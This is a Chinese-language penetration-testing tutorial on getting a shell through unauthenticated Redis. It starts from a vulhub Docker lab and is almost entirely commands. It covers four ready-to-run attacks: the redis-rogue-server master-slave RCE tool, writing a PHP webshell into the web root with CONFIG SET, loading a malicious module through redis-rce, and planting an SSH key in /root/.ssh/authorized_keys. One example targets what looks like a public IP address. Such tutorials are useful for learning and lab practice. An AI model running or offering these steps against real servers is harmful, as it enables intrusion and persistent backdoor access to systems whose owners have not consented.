getshell(一)(上文)
docker演示
进入vulhub目录使用以下命令启动靶机
cd /vulhub-master/redis/4-unacc
docker-compose up -d
docker ps
kali中
安装redis
apt-get install redis
连接,ip换为docker容器ip地址
redis-cli -h 39.105.47.83 -p 6379
直接连接执行命令且不需要认证说明存在未授权访问漏洞
下载以下攻击项目
https://github.com/n0b0dyCN/redis-rogue-server
下载完成后解压
在项目目录下执行以下命令
python3 redis-rogue-server.py --rhost 39.105.47.83 --lhost 39.105.47.83
若执行错误,再次执行一下就行
输入i就可以进入shell
安装redis
建议在contos上安装,命令相同,下面只是演示 kali做攻击机
wget https://download.redis.io/releases/redis-4.0.9.tar.gz
tar zxvf redis-4.0.9.tar.gz
移动一下安装地点
mv redis-4.0.9 /usr/local/redis
make
make install
vim redis.conf
getshell(二)
需要有网站建立才能成功
在kali上输入
redis-cli -h 192.168.219.128 -p 6379
连接成功后,输入
CONFIG SET dir /var/www/html 修改存储路径为Web目录
CONFIG SET dbfilename shell.php 设置文件名为shell.php
SET shell "<?php system($_GET['cmd']);?>" 保存木马
save
蚁剑连接或直接网址访问
http://ip/shell.php
http://ip/shell.php?cmd=whoami
getshell(三)
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git
下载完成后进入RedisModules-ExecuteCommand目录输入make
会生成moudle.so 文件
然后把生成的moudle.so复制到redis-rce目录里面
进入 redis-rce目录里面终端输入
python redis-rce.py -r 192.168.111.132 -p 6379 -L 192.168.111.130 -f moudle.so
getshell(四)
公钥
ssh-keygen -t rsa # 默认保存到~/.ssh/id_rsa.pub
(echo -e "\n";cat /root/.ssh/id_rsa.pub;echo -e "\n")>1.txt 记得修改为自己的密钥地址
输入
cat 1.txt |redis-cli -h 192.168.111.130 -x set crack
连接成功后在输入
config set dir /root/.ssh
config set dbfilename authorized_keys
save
使用ssh登录就可以了